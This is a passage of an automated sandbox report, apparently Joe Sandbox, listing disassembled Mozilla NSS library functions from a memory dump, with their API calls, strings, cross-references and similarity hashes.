Instruction Fuzzy Hash: 33517CB1E086125BE308D6389C51F7F36569F96348F054538EA06976C2FB25E90A82E7

Function 6D564FE0 Relevance: 40.4, APIs: 18, Strings: 5, Instructions: 175COMMON

Download Yara Rule

APIs

isspace.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,?,?,?,?,?,00000000,00000000,?,6D5175C2,00000000,00000000,00000001), ref: 6D565009
PL_strncasecmp.NSS3(?,library=,00000008,?,?,?,?,?,?,?,?,00000000,00000000,?,6D5175C2,00000000), ref: 6D565049
PL_strncasecmp.NSS3(?,name=,00000005,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6D56505D
PL_strncasecmp.NSS3(?,parameters=,0000000B,?,?,?,?,?,?,?,?), ref: 6D565071
PL_strncasecmp.NSS3(?,nss=,00000004,?,?,?,?,?,?,?,?,?,?,?), ref: 6D565089
PL_strncasecmp.NSS3(?,config=,00000007,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6D5650A1
NSSUTIL_ArgSkipParameter.NSS3(?), ref: 6D5650B2
free.MOZGLUE(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,6D5175C2), ref: 6D5650CB
NSSUTIL_ArgFetchValue.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6D5650D9
free.MOZGLUE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 6D5650F5
NSSUTIL_ArgFetchValue.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6D565103
free.MOZGLUE(?,?,?,?,?,?,?,?,?,?,?,?), ref: 6D56511D
NSSUTIL_ArgFetchValue.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6D56512B
free.MOZGLUE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6D565145
NSSUTIL_ArgFetchValue.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6D565153
free.MOZGLUE(?), ref: 6D56516D
NSSUTIL_ArgFetchValue.NSS3(?,?), ref: 6D56517B
isspace.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6D565195

Strings

library=, xrefs: 6D565043
config=, xrefs: 6D56509B
nss=, xrefs: 6D565083
name=, xrefs: 6D565057
parameters=, xrefs: 6D56506B

Memory Dump Source

Source File: 0000000E.00000002.3245470365.000000006D481000.00000020.00000001.01000000.0000001C.sdmp, Offset: 6D480000, based on PE: true

Associated: 0000000E.00000002.3245278272.000000006D480000.00000002.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3247311062.000000006D61F000.00000002.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3247819676.000000006D65E000.00000004.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248022740.000000006D65F000.00000008.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248173444.000000006D660000.00000004.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248328320.000000006D665000.00000002.00000001.01000000.0000001C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_6d480000_232a1df2aa.jbxd

Similarity

API ID: FetchL_strncasecmpValuefree$isspace$ParameterSkip
String ID: config=$library=$name=$nss=$parameters=
API String ID: 391827415-203331871
Opcode ID: e2b0df1b2278f04fd7376025ce899ffdf0a237e1ccbf8f9aa9fd9bbbcd119714
Instruction ID: 566599abf417f353457cd07e71b5a001ebcb4b27c4b0f0784513b35798bf11ce
Opcode Fuzzy Hash: e2b0df1b2278f04fd7376025ce899ffdf0a237e1ccbf8f9aa9fd9bbbcd119714
Instruction Fuzzy Hash: E351E6B5D40246ABEB05CF24DC41ABB37A8AF06249F080424FC55E7752EB36E915CBF2

Function 6D564C10 Relevance: 40.4, APIs: 13, Strings: 10, Instructions: 146stringmemoryCOMMON

Download Yara Rule

APIs

PR_smprintf.NSS3(%s,%s,00000000,?,0000002F,?,?,?,00000000,00000000,?,6D554F51,00000000), ref: 6D564C50
free.MOZGLUE(00000000,?,?,?,0000002F,?,?,?,00000000,00000000,?,6D554F51,00000000), ref: 6D564C5B
PR_smprintf.NSS3(6D63AAF9,?,0000002F,?,?,?,00000000,00000000,?,6D554F51,00000000), ref: 6D564C76
PORT_ZAlloc_Util.NSS3(0000001A,0000002F,?,?,?,00000000,00000000,?,6D554F51,00000000), ref: 6D564CAE
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6D564CC9
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6D564CF4
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6D564D0B
free.MOZGLUE(00000000,?,?,?,0000002F,?,?,?,00000000,00000000,?,6D554F51,00000000), ref: 6D564D5E
free.MOZGLUE(00000000,?,?,?,0000002F,?,?,?,00000000,00000000,?,6D554F51,00000000), ref: 6D564D68
PR_smprintf.NSS3(0x%08lx=[%s %s],0000002F,?,00000000), ref: 6D564D85
PR_smprintf.NSS3(0x%08lx=[%s askpw=%s timeout=%d %s],0000002F,?,?,?,00000000), ref: 6D564DA2
free.MOZGLUE(?), ref: 6D564DB9
free.MOZGLUE(00000000), ref: 6D564DCF

Strings

rootFlags, xrefs: 6D564D47
timeout, xrefs: 6D564C91
any, xrefs: 6D564C96
0x%08lx=[%s %s], xrefs: 6D564D80
%s,%s, xrefs: 6D564C4B
rust, xrefs: 6D564D22
0x%08lx=[%s askpw=%s timeout=%d %s], xrefs: 6D564D9D
slotFlags, xrefs: 6D564D34
every, xrefs: 6D564CA1
ootT, xrefs: 6D564D1A

Memory Dump Source

Source File: 0000000E.00000002.3245470365.000000006D481000.00000020.00000001.01000000.0000001C.sdmp, Offset: 6D480000, based on PE: true

Associated: 0000000E.00000002.3245278272.000000006D480000.00000002.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3247311062.000000006D61F000.00000002.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3247819676.000000006D65E000.00000004.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248022740.000000006D65F000.00000008.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248173444.000000006D660000.00000004.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248328320.000000006D665000.00000002.00000001.01000000.0000001C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_6d480000_232a1df2aa.jbxd

Similarity

API ID: free$R_smprintf$strlen$Alloc_Util
String ID: %s,%s$0x%08lx=[%s %s]$0x%08lx=[%s askpw=%s timeout=%d %s]$any$every$ootT$rootFlags$rust$slotFlags$timeout
API String ID: 3756394533-2552752316
Opcode ID: 8377584ef6036806864d0a1c68efc8eaeca618402ef3cfb84496148cd6d77319
Instruction ID: 96c490e27e3f304598d1dd89d8d1c4cbbe999ae372addd4227ceee00bcae9f83
Opcode Fuzzy Hash: 8377584ef6036806864d0a1c68efc8eaeca618402ef3cfb84496148cd6d77319
Instruction Fuzzy Hash: 8B4191B1C08192ABEB128F599C54A7B3B75AF9A348F064124FC1A47315E731D964C7F3

Function 6D546910 Relevance: 38.6, APIs: 15, Strings: 7, Instructions: 131COMMON

Download Yara Rule

APIs

NSSUTIL_ArgHasFlag.NSS3(flags,readOnly,00000000), ref: 6D546943

Part of subcall function 6D564210: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,93857CC8,flags,?,00000000,?,6D545947,flags,printPolicyFeedback,?,?,?,?,?,?,00000000), ref: 6D564220
Part of subcall function 6D564210: NSSUTIL_ArgGetParamValue.NSS3(?,GYTm,?,?,?,?,?,?,00000000,?,00000000,?,6D547703,?,00000000,00000000), ref: 6D56422D
Part of subcall function 6D564210: PL_strncasecmp.NSS3(00000000,?,?,?,?,?,?,?,?,?,?,00000000,?,00000000,?,6D547703), ref: 6D56424B
Part of subcall function 6D564210: free.MOZGLUE(00000000,?,?,?,?,?,?,?,?,00000000,?,00000000,?,6D547703,?,00000000), ref: 6D564272

NSSUTIL_ArgHasFlag.NSS3(flags,nocertdb,00000000), ref: 6D546957
NSSUTIL_ArgHasFlag.NSS3(flags,nokeydb,00000000), ref: 6D546972
NSSUTIL_ArgStrip.NSS3(00000000), ref: 6D546983

Part of subcall function 6D563EA0: isspace.API-MS-WIN-CRT-STRING-L1-1-0(8914C483,70E85609,6D53C79F,?,6D546247,70E85609,?,?,6D53C79F,6D54781D,?,6D53BD52,00000001,70E85609,D85D8B04,?), ref: 6D563EB8

PL_strncasecmp.NSS3(00000000,configdir=,0000000A), ref: 6D5469AA
PL_strncasecmp.NSS3(00000000,certPrefix=,0000000B), ref: 6D5469BE
PL_strncasecmp.NSS3(00000000,keyPrefix=,0000000A), ref: 6D5469D2
NSSUTIL_ArgSkipParameter.NSS3(00000000), ref: 6D5469DF

Part of subcall function 6D564020: isspace.API-MS-WIN-CRT-STRING-L1-1-0(FFFFEF69,00000000,?,?,766B4C80,?,6D5650B7,?), ref: 6D564041

free.MOZGLUE(00000000), ref: 6D5469F6
NSSUTIL_ArgFetchValue.NSS3(-0000000A,?), ref: 6D546A04
free.MOZGLUE(00000000), ref: 6D546A1B
NSSUTIL_ArgFetchValue.NSS3(-0000000B,?), ref: 6D546A29
free.MOZGLUE(00000000), ref: 6D546A3F
NSSUTIL_ArgFetchValue.NSS3(-0000000A,?), ref: 6D546A4D
NSSUTIL_ArgStrip.NSS3(?), ref: 6D546A5B

Strings

flags, xrefs: 6D546937, 6D546942, 6D546956, 6D54696D
certPrefix=, xrefs: 6D5469B8
keyPrefix=, xrefs: 6D5469CC
readOnly, xrefs: 6D54693D
nokeydb, xrefs: 6D546968
nocertdb, xrefs: 6D546951
configdir=, xrefs: 6D5469A4

Memory Dump Source

Source File: 0000000E.00000002.3245470365.000000006D481000.00000020.00000001.01000000.0000001C.sdmp, Offset: 6D480000, based on PE: true

Associated: 0000000E.00000002.3245278272.000000006D480000.00000002.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3247311062.000000006D61F000.00000002.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3247819676.000000006D65E000.00000004.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248022740.000000006D65F000.00000008.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248173444.000000006D660000.00000004.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248328320.000000006D665000.00000002.00000001.01000000.0000001C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_6d480000_232a1df2aa.jbxd

Similarity

API ID: L_strncasecmpValuefree$FetchFlag$Stripisspace$ParamParameterSkipstrlen
String ID: certPrefix=$configdir=$flags$keyPrefix=$nocertdb$nokeydb$readOnly
API String ID: 2065226673-2785624044
Opcode ID: 31e91979200aa8ff7c6653d33401ae980e1e15d11e33499c3d703a769ffdbaef
Instruction ID: 6cd508c1f5d2fa2d065b3b460bf7a17644539b03e41fc6a04d657af9dc3fa146
Opcode Fuzzy Hash: 31e91979200aa8ff7c6653d33401ae980e1e15d11e33499c3d703a769ffdbaef
Instruction Fuzzy Hash: A14162B1E04306ABE704DB65AC81B6B77A8AF45348F098834E905E7642F735DE1487F2

Function 6D546CD0 Relevance: 37.0, APIs: 20, Strings: 1, Instructions: 298stringCOMMON

Download Yara Rule

APIs

Part of subcall function 6D546910: NSSUTIL_ArgHasFlag.NSS3(flags,readOnly,00000000), ref: 6D546943
Part of subcall function 6D546910: NSSUTIL_ArgHasFlag.NSS3(flags,nocertdb,00000000), ref: 6D546957
Part of subcall function 6D546910: NSSUTIL_ArgHasFlag.NSS3(flags,nokeydb,00000000), ref: 6D546972
Part of subcall function 6D546910: NSSUTIL_ArgStrip.NSS3(00000000), ref: 6D546983
Part of subcall function 6D546910: PL_strncasecmp.NSS3(00000000,configdir=,0000000A), ref: 6D5469AA
Part of subcall function 6D546910: PL_strncasecmp.NSS3(00000000,certPrefix=,0000000B), ref: 6D5469BE
Part of subcall function 6D546910: PL_strncasecmp.NSS3(00000000,keyPrefix=,0000000A), ref: 6D5469D2
Part of subcall function 6D546910: NSSUTIL_ArgSkipParameter.NSS3(00000000), ref: 6D5469DF
Part of subcall function 6D546910: NSSUTIL_ArgStrip.NSS3(?), ref: 6D546A5B

strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,00000000), ref: 6D546D8C
free.MOZGLUE(00000000), ref: 6D546DC5
free.MOZGLUE(?), ref: 6D546DD6
free.MOZGLUE(?), ref: 6D546DE7
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,00000000), ref: 6D546E1F
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?), ref: 6D546E4B
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?), ref: 6D546E72
free.MOZGLUE(?), ref: 6D546EA7
free.MOZGLUE(?), ref: 6D546EC4
free.MOZGLUE(?), ref: 6D546ED5
free.MOZGLUE(00000000), ref: 6D546EE3
free.MOZGLUE(?), ref: 6D546EF4
free.MOZGLUE(?), ref: 6D546F08
free.MOZGLUE(00000000), ref: 6D546F35
free.MOZGLUE(?), ref: 6D546F44
free.MOZGLUE(?), ref: 6D546F5B
free.MOZGLUE(00000000), ref: 6D546F65

Part of subcall function 6D546C30: strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,dbm:,00000004,6D54781D,00000000,6D53BE2C,?,6D546B1D,?,?,?,?,00000000,00000000,6D54781D), ref: 6D546C40
Part of subcall function 6D546C30: strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,sql:,00000004,?,?,?,?,?,?,?,00000000,00000000,6D54781D,?,6D53BE2C,?), ref: 6D546C58
Part of subcall function 6D546C30: strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,rdb:,00000004,?,?,?,?,?,?,?,?,?,?,00000000,00000000,6D54781D), ref: 6D546C6F
Part of subcall function 6D546C30: strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,extern:,00000007), ref: 6D546C84
Part of subcall function 6D546C30: PR_GetEnvSecure.NSS3(NSS_DEFAULT_DB_TYPE), ref: 6D546C96
Part of subcall function 6D546C30: strcmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,dbm), ref: 6D546CAA

strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?), ref: 6D546F90
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?), ref: 6D546FC5
PK11_GetInternalKeySlot.NSS3 ref: 6D546FF4

Strings

+`Um, xrefs: 6D546D0D

Memory Dump Source

Source File: 0000000E.00000002.3245470365.000000006D481000.00000020.00000001.01000000.0000001C.sdmp, Offset: 6D480000, based on PE: true

Associated: 0000000E.00000002.3245278272.000000006D480000.00000002.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3247311062.000000006D61F000.00000002.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3247819676.000000006D65E000.00000004.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248022740.000000006D65F000.00000008.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248173444.000000006D660000.00000004.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248328320.000000006D665000.00000002.00000001.01000000.0000001C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_6d480000_232a1df2aa.jbxd

Similarity

API ID: free$strcmp$strncmp$FlagL_strncasecmp$Strip$InternalK11_ParameterSecureSkipSlot
String ID: +`Um
API String ID: 1304971872-3933178103
Opcode ID: 75ddca8fa65278c826f253ff3cbd73b68f9ee7cd4cf993b2bef66d153d113512
Instruction ID: 275ef43c55b72894c455086c30863e4279d34cfb7650d2e221b1fc25d2a6574b
Opcode Fuzzy Hash: 75ddca8fa65278c826f253ff3cbd73b68f9ee7cd4cf993b2bef66d153d113512
Instruction Fuzzy Hash: 5EB13DB4D0431AAFEF05CBA9D844BEFBBF4AF05304F058425E915A7A41E731E954CBA2

Function 6D4F1FE0 Relevance: 37.0, APIs: 19, Strings: 2, Instructions: 254COMMON

Download Yara Rule

APIs

calloc.MOZGLUE(00000001,00000084,00000001,00000000), ref: 6D4F2007
calloc.MOZGLUE(00000001,00000084), ref: 6D4F2077
calloc.MOZGLUE(00000001,0000002C), ref: 6D4F20DF
TlsSetValue.KERNEL32(00000000), ref: 6D4F2188
PR_NewCondVar.NSS3 ref: 6D4F21B7
calloc.MOZGLUE(00000001,00000084), ref: 6D4F221C
InitializeCriticalSectionAndSpinCount.KERNEL32(0000001C,000005DC), ref: 6D4F22C2
GetLastError.KERNEL32 ref: 6D4F22CD
free.MOZGLUE(00000000), ref: 6D4F22DD

Part of subcall function 6D4F0F00: PR_GetPageSize.NSS3(6D4F0936,FFFFE8AE,?,6D4816B7,00000000,?,6D4F0936,00000000,?,6D48204A), ref: 6D4F0F1B
Part of subcall function 6D4F0F00: PR_NewLogModule.NSS3(clock,6D4F0936,FFFFE8AE,?,6D4816B7,00000000,?,6D4F0936,00000000,?,6D48204A), ref: 6D4F0F25

Strings

X fm, xrefs: 6D4F218E
T fm, xrefs: 6D4F2361

Memory Dump Source

Source File: 0000000E.00000002.3245470365.000000006D481000.00000020.00000001.01000000.0000001C.sdmp, Offset: 6D480000, based on PE: true

Associated: 0000000E.00000002.3245278272.000000006D480000.00000002.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3247311062.000000006D61F000.00000002.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3247819676.000000006D65E000.00000004.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248022740.000000006D65F000.00000008.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248173444.000000006D660000.00000004.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248328320.000000006D665000.00000002.00000001.01000000.0000001C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_6d480000_232a1df2aa.jbxd

Similarity

API ID: calloc$CondCountCriticalErrorInitializeLastModulePageSectionSizeSpinValuefree
String ID: T fm$X fm
API String ID: 3559583721-1859926644
Opcode ID: 95dcb993b43dc95fce98991a71aa8d5c75f2205f8274a3a83439fbc212dde38e
Instruction ID: a1dff0c96c6033ba870e2ed443bf3fbbec114a6681573ef8247ad18e2b1355a7
Opcode Fuzzy Hash: 95dcb993b43dc95fce98991a71aa8d5c75f2205f8274a3a83439fbc212dde38e
Instruction Fuzzy Hash: D491AFB16007829FDB20DF7ACC44B6B7BF4BB4A704F01452EE55AD6640DB70A946CFA2

Function 6D50DDD0 Relevance: 35.2, APIs: 17, Strings: 3, Instructions: 169memorystringtimeCOMMON

Download Yara Rule

APIs

PORT_NewArena_Util.NSS3(00000800), ref: 6D50DDDE

Part of subcall function 6D560FF0: calloc.MOZGLUE(00000001,00000024,00000000,?,?,6D5087ED,00000800,6D4FEF74,00000000), ref: 6D561000
Part of subcall function 6D560FF0: PR_NewLock.NSS3(?,00000800,6D4FEF74,00000000), ref: 6D561016
Part of subcall function 6D560FF0: PL_InitArenaPool.NSS3(00000000,security,6D5087ED,00000008,?,00000800,6D4FEF74,00000000), ref: 6D56102B

PORT_ArenaAlloc_Util.NSS3(00000000,00000018), ref: 6D50DDF5

Part of subcall function 6D5610C0: TlsGetValue.KERNEL32(?,6D508802,00000000,00000008,?,6D4FEF74,00000000), ref: 6D5610F3
Part of subcall function 6D5610C0: EnterCriticalSection.KERNEL32(?,?,6D508802,00000000,00000008,?,6D4FEF74,00000000), ref: 6D56110C
Part of subcall function 6D5610C0: PL_ArenaAllocate.NSS3(?,?,?,6D508802,00000000,00000008,?,6D4FEF74,00000000), ref: 6D561141
Part of subcall function 6D5610C0: PR_Unlock.NSS3(?,?,?,6D508802,00000000,00000008,?,6D4FEF74,00000000), ref: 6D561182
Part of subcall function 6D5610C0: TlsGetValue.KERNEL32(?,6D508802,00000000,00000008,?,6D4FEF74,00000000), ref: 6D56119C

PORT_ArenaAlloc_Util.NSS3(00000000,00000000), ref: 6D50DE34
PR_Now.NSS3 ref: 6D50DE93
CERT_CheckCertValidTimes.NSS3(?,00000000,?,00000000), ref: 6D50DE9D
strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6D50DEB4
PORT_ArenaAlloc_Util.NSS3(?,00000001), ref: 6D50DEC3
memcpy.VCRUNTIME140(00000000,?,00000001), ref: 6D50DED8
PR_smprintf.NSS3(%s%s,?,?), ref: 6D50DEF0
PR_smprintf.NSS3(6D63AAF9,(NULL) (Validity Unknown)), ref: 6D50DF04
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6D50DF13
PORT_ArenaAlloc_Util.NSS3(?,00000001), ref: 6D50DF22
memcpy.VCRUNTIME140(00000000,00000000,00000001), ref: 6D50DF33
free.MOZGLUE(00000000), ref: 6D50DF3C
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6D50DF4B
free.MOZGLUE(00000000), ref: 6D50DF74
PORT_FreeArena_Util.NSS3(00000000,00000000), ref: 6D50DF8E

Strings

(NULL) (Validity Unknown), xrefs: 6D50DEFA
{???}, xrefs: 6D50DE8B
%s%s, xrefs: 6D50DEEB

Memory Dump Source

Source File: 0000000E.00000002.3245470365.000000006D481000.00000020.00000001.01000000.0000001C.sdmp, Offset: 6D480000, based on PE: true

Associated: 0000000E.00000002.3245278272.000000006D480000.00000002.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3247311062.000000006D61F000.00000002.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3247819676.000000006D65E000.00000004.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248022740.000000006D65F000.00000008.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248173444.000000006D660000.00000004.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248328320.000000006D665000.00000002.00000001.01000000.0000001C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_6d480000_232a1df2aa.jbxd

Similarity

API ID: ArenaUtil$Alloc_$strlen$Arena_R_smprintfValuefreememcpy$AllocateCertCheckCriticalEnterFreeInitLockPoolSectionTimesUnlockValidcalloc
String ID: %s%s$(NULL) (Validity Unknown)${???}
API String ID: 1882561532-3437882492
Opcode ID: b18b238573425e8f587e8cb29229209185cf096b056a9f977b772183732d8784
Instruction ID: 72f7ad563835c94099ab2c1a36d8dc90db55954df78f6320332eed08b11ce3a8
Opcode Fuzzy Hash: b18b238573425e8f587e8cb29229209185cf096b056a9f977b772183732d8784
Instruction Fuzzy Hash: 6851B0B1D042129BDB08CE699C41A7F7AB8AFD9258F058429E909E7B01F731DD00CBA2

Function 6D542D80 Relevance: 33.4, APIs: 22, Instructions: 381COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32(?,?,?,?,?,00000000,?), ref: 6D542DEC
EnterCriticalSection.KERNEL32(?,?,?,?,?,?,00000000,?), ref: 6D542E00
PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 6D542E2B
PR_SetError.NSS3(00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 6D542E43
TlsGetValue.KERNEL32(?,?,?,?,?,?,?,00000000,?,?,?,6D514F1C,?,-00000001,00000000,?), ref: 6D542E74
EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,00000000,?,?,?,6D514F1C,?,-00000001,00000000), ref: 6D542E88
PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 6D542EC6
TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 6D542EE4
EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 6D542EF8
PR_Unlock.NSS3(?), ref: 6D542F62
TlsGetValue.KERNEL32 ref: 6D542F86
EnterCriticalSection.KERNEL32(0000001C), ref: 6D542F9E
PR_Unlock.NSS3(?), ref: 6D542FCA
TlsGetValue.KERNEL32 ref: 6D54301A
EnterCriticalSection.KERNEL32(?), ref: 6D54302E
PR_Unlock.NSS3(?), ref: 6D543066
PR_SetError.NSS3(00000000,00000000), ref: 6D543085
PR_Unlock.NSS3(?), ref: 6D5430EC
TlsGetValue.KERNEL32 ref: 6D54310C
EnterCriticalSection.KERNEL32(0000001C), ref: 6D543124
PR_Unlock.NSS3(?), ref: 6D54314C

Part of subcall function 6D529180: PK11_NeedUserInit.NSS3(?,?,?,00000000,00000001,6D55379E,?,6D529568,00000000,?,6D55379E,?,00000001,?), ref: 6D52918D
Part of subcall function 6D529180: PR_SetError.NSS3(FFFFE000,00000000,?,?,?,00000000,00000001,6D55379E,?,6D529568,00000000,?,6D55379E,?,00000001,?), ref: 6D5291A0

Part of subcall function 6D4F07A0: TlsGetValue.KERNEL32(00000000,?,?,?,?,6D48204A), ref: 6D4F07AD
Part of subcall function 6D4F07A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6D48204A), ref: 6D4F07CD
Part of subcall function 6D4F07A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6D48204A), ref: 6D4F07D6
Part of subcall function 6D4F07A0: calloc.MOZGLUE(00000001,00000144,?,?,?,?,6D48204A), ref: 6D4F07E4
Part of subcall function 6D4F07A0: TlsSetValue.KERNEL32(00000000,?,6D48204A), ref: 6D4F0864
Part of subcall function 6D4F07A0: calloc.MOZGLUE(00000001,0000002C), ref: 6D4F0880
Part of subcall function 6D4F07A0: TlsSetValue.KERNEL32(00000000,?,?,6D48204A), ref: 6D4F08CB
Part of subcall function 6D4F07A0: TlsGetValue.KERNEL32(?,?,6D48204A), ref: 6D4F08D7
Part of subcall function 6D4F07A0: TlsGetValue.KERNEL32(?,?,6D48204A), ref: 6D4F08FB

PR_SetError.NSS3(00000000,00000000), ref: 6D54316D

Memory Dump Source

Source File: 0000000E.00000002.3245470365.000000006D481000.00000020.00000001.01000000.0000001C.sdmp, Offset: 6D480000, based on PE: true

Associated: 0000000E.00000002.3245278272.000000006D480000.00000002.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3247311062.000000006D61F000.00000002.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3247819676.000000006D65E000.00000004.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248022740.000000006D65F000.00000008.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248173444.000000006D660000.00000004.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248328320.000000006D665000.00000002.00000001.01000000.0000001C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_6d480000_232a1df2aa.jbxd

Similarity

API ID: Value$Unlock$CriticalEnterSection$Error$calloc$InitK11_NeedUser
String ID:
API String ID: 3383223490-0
Opcode ID: 84d5ba8291ecd6d2a0dcff2a945835b52e6a94f2efd9c67b85ee3422200eac27
Instruction ID: bcdc05ea2bffd5df1b46985c905a78109a5dc8f35e3d4c026fb35874689fea4d
Opcode Fuzzy Hash: 84d5ba8291ecd6d2a0dcff2a945835b52e6a94f2efd9c67b85ee3422200eac27
Instruction Fuzzy Hash: 58F1DF75C0021AAFEF04DF65D845BAEBBB4FF09314F058569EC05A7621E730E891CB82

Function 6D56C980 Relevance: 33.3, APIs: 22, Instructions: 298memoryCOMMON

Download Yara Rule

APIs

PORT_NewArena_Util.NSS3(00000400,6D56AEB0,?,00000004,00000001,?,00000000,?,?), ref: 6D56C98E

Part of subcall function 6D560FF0: calloc.MOZGLUE(00000001,00000024,00000000,?,?,6D5087ED,00000800,6D4FEF74,00000000), ref: 6D561000
Part of subcall function 6D560FF0: PR_NewLock.NSS3(?,00000800,6D4FEF74,00000000), ref: 6D561016
Part of subcall function 6D560FF0: PL_InitArenaPool.NSS3(00000000,security,6D5087ED,00000008,?,00000800,6D4FEF74,00000000), ref: 6D56102B

PORT_ArenaAlloc_Util.NSS3(00000000,00000028,?,6D56AEB0,?,00000004,00000001,?,00000000,?,?), ref: 6D56C9A1

Part of subcall function 6D5610C0: TlsGetValue.KERNEL32(?,6D508802,00000000,00000008,?,6D4FEF74,00000000), ref: 6D5610F3
Part of subcall function 6D5610C0: EnterCriticalSection.KERNEL32(?,?,6D508802,00000000,00000008,?,6D4FEF74,00000000), ref: 6D56110C
Part of subcall function 6D5610C0: PL_ArenaAllocate.NSS3(?,?,?,6D508802,00000000,00000008,?,6D4FEF74,00000000), ref: 6D561141
Part of subcall function 6D5610C0: PR_Unlock.NSS3(?,?,?,6D508802,00000000,00000008,?,6D4FEF74,00000000), ref: 6D561182
Part of subcall function 6D5610C0: TlsGetValue.KERNEL32(?,6D508802,00000000,00000008,?,6D4FEF74,00000000), ref: 6D56119C

SECOID_FindOIDByTag_Util.NSS3(0000001A,?,?,?,6D56AEB0,?,00000004,00000001,?,00000000,?,?), ref: 6D56C9D3

Part of subcall function 6D560840: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6D5608B4

SECITEM_CopyItem_Util.NSS3(00000000,-00000018,00000000,?,?,?,?,6D56AEB0,?,00000004,00000001,?,00000000,?,?), ref: 6D56C9E6

Part of subcall function 6D55FB60: PORT_ArenaAlloc_Util.NSS3(00000000,E0056800,00000000,?,?,6D558D2D,?,00000000,?), ref: 6D55FB85
